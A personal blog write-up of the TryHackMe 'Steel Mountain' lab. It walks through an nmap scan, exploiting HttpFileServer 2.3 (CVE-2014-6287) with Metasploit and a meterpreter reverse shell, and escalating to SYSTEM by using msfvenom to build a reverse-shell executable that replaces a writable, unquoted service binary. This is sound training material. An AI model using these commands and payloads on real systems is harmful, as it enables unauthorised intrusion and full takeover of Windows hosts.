u915

Daniel Cano MerchΓ‘n - Hacking & Tech

Writeup Tryhackme Steel Mountain

This is the first post about Tryhackme. A guided and more relaxed hacking platform than htb, in my opinion.

https://tryhackme.com

I am totally new on this hacking platform and I am doing the path Offensive Pentesting Advanced exploitation just for fun. I am not sure if tryhackme allows to post Writeups, because I could not find any information about this, so if it is forbidden please contact me.

Note: Some sensitive information like IPs and full flags are replaced with πŸ˜„ also the answers are not on the tryhackme format. Just to sleep better.

So go ahead, the writeup.

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with a nmap scan:

sudo nmap -sS -sV -sC -O -p- --script vuln 10.10.πŸ˜„
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 17:46 CEST
Nmap scan report for 10.10.πŸ˜„
Host is up (0.040s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE            VERSION
80/tcp    open  http               Microsoft IIS httpd 8.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/8.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp  open  ssl/ms-wbt-server?
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
|             Modulus Type: Safe prime
|             Modulus Source: RFC2409/Oakley Group 2
|             Modulus Length: 1024
|             Generator Length: 1024
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
|_sslv2-drown: 
5985/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
8080/tcp  open  http               HttpFileServer httpd 2.3
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter: 
|   
|_    Couldn't find a file-type field.
| http-method-tamper: 
|   VULNERABLE:
|   Authentication bypass by HTTP verb tampering
|     State: VULNERABLE (Exploitable)
|       This web server contains password protected resources vulnerable to authentication bypass
|       vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
|        common HTTP methods and in misconfigured .htaccess files.
|              
|     Extra information:
|       
|   URIs suspected to be vulnerable to HTTP verb tampering:
|     /~login [GENERIC]
|   
|     References:
|       http://www.imperva.com/resources/glossary/http_verb_tampering.html
|       http://www.mkit.com.ar/labs/htexploit/
|       https://www.owasp.org/index.php/Testing_for_HTTP_Methods_and_XST_%28OWASP-CM-008%29
|_      http://capec.mitre.org/data/definitions/274.html
|_http-server-header: HFS 2.3
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2011-3192: 
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://seclists.org/fulldisclosure/2011/Aug/175
|       https://www.tenable.com/plugins/nessus/55976
|       https://www.securityfocus.com/bid/49303
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49155/tcp open  msrpc              Microsoft Windows RPC
49156/tcp open  msrpc              Microsoft Windows RPC
49163/tcp open  msrpc              Microsoft Windows RPC
49164/tcp open  msrpc              Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=80%CT=1%CU=36036%PV=Y%DS=2%DC=I%G=Y%TM=60AE707
OS:1%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=
OS:7)OPS(O1=M506NW8ST11%O2=M506NW8ST11%O3=M506NW8NNT11%O4=M506NW8ST11%O5=M5
OS:06NW8ST11%O6=M506ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=200
OS:0)ECN(R=Y%DF=Y%T=80%W=2000%O=M506NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%
OS:T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=
OS:0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%
OS:S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(
OS:R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=
OS:N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_samba-vuln-cve-2012-1182: No accounts left to try
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 823.86 seconds

So there are several ports open, 80, 135, 139, 445, 3389, 5985, 47001. Just browsing to the site on the default port 80

alt text

Just looking to the page source code:

<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>Steel Mountain</title>
<style>
* {font-family: Arial;}
</style>
</head>
<body><center>
<a href="index.html"><img src="/img/logo.png" style="width:500px;height:300px;"/></a>
<h3>Employee of the month</h3>
<img src="/img/BillHarper.png" style="width:200px;height:200px;"/>
</center>
</body>
</html>

Using the browser to check what is inside the port 8080:

alt text

Here we got the exact version HttpFileServer 2.3, clicking on the version link points to http://www.rejetto.com/hfs/

2 - Vulnerability Identification

So a quick search reveals that it is vulnerable to RCE:

searchsploit httpfileserver

Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) | windows/webapps/49125.py

Shellcodes: No Results

Also there is a Metasploit module.

Checking the exploit:

https://www.exploit-db.com/exploits/49125

The CVE is:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287

3 - Exploit

Using this time Metasploit to take it easy and live longer. I will try to mix the use of Metasploit and the manual exploitation depending on the energy I have on the day.

This is the module used with the configuration and payload set:

msf6 exploit(windows/http/rejetto_hfs_exec) > show options

Module options (exploit/windows/http/rejetto_hfs_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   HTTPDELAY  10               no        Seconds to wait before terminating web server
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.πŸ˜„    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path of the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     πŸ˜„ 	               yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Pressing the big button and starting the exploit:

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on πŸ˜„ :4444 
[*] Using URL: http://0.0.0.0:8080/TtG31N2LZQ
[*] Local IP: http://192.168.1.84:8080/TtG31N2LZQ
[*] Server started.
[*] Sending a malicious request to /
[*] Payload request received: /TtG31N2LZQ
[*] Sending stage (175174 bytes) to 10.10.πŸ˜„ 
[!] Tried to delete %TEMP%\MUTmQHFQQU.vbs, unknown result
[*] Meterpreter session 3 opened (πŸ˜„ :4444 -> 10.10.πŸ˜„:49254) at 2021-05-26 18:07:54 +0200
[*] Server stopped.

Worked, so looting the user flag.

C:\Users\bill\Desktop
user.txt

b047πŸ˜„

4 - Post-Exploitation and privilege eescalation

Now is time to get root. I did not use the recommended tool PowerUp I used WinPEAS:

https://github.com/carlospolop/privilege-eescalation-awesome-scripts-suite/tree/master/winPEAS


  [+] Interesting Services -non Microsoft-
   [?] Check if you can overwrite some service binary or perform a DLL hijacking, also check for unquoted paths https://book.hacktricks.xyz/windows/windows-local-privilege-eescalation#services
    AdvancedSystemCareService9(IObit - Advanced SystemCare Service 9)[C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe] - Auto - Running - No quotes and Space detected
    File Permissions: bill [WriteData/CreateFiles]
    Possible DLL Hijacking in binary folder: C:\Program Files (x86)\IObit\Advanced SystemCare (bill [WriteData/CreateFiles])
    Advanced SystemCare Service

So the service AdvancedSystemCareService9 is running with no quotes and space detected, also the file is writtable so my approach was just to replace the file, with a reverse shell executable.

msf6 exploit(windows/http/rejetto_hfs_exec) > msfvenom -p windows/shell_reverse_tcp LHOST=πŸ˜„ LPORT=4433 -e x86/shikata_ga_nai -f exe -o ASCService.exe

After that a listener is needed. So I used the metasploit module multi/handler to manage the meterpreter shell windows/meterpreter/reverse_tcp

With the .exe generated I just uploaded it to the server with meterpreter and stopped the service.

C:\Program Files (x86)\IObit\Advanced SystemCare>sc stop AdvancedSystemCareService9
sc stop AdvancedSystemCareService9

SERVICE_NAME: AdvancedSystemCareService9 
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 4  RUNNING 
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

Stopped first because it will show an error if you try to replace the .exe file service, ASCService.exe when it is still running.

Copying the .exe generated and replacing the service file:

C:\Program Files (x86)\IObit\Advanced SystemCare>copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
copy C:\Users\bill\Desktop\ASCService.exe ASCService.exe
Overwrite ASCService.exe? (Yes/No/All): Yes
Yes
        1 file(s) copied.

Starting again the service to trigger the .exe with the reverse shell:

C:\Program Files (x86)\IObit\Advanced SystemCare>sc start AdvancedSystemCareService9
sc start AdvancedSystemCareService9
[SC] StartService FAILED with error 216.
When the server is started again the reverse shell is completed

Finally getting the admin flag:

meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

meterpreter > cd /users/administrator/desktop

meterpreter > cat root.txt
9af5πŸ˜„

Thanks for reading!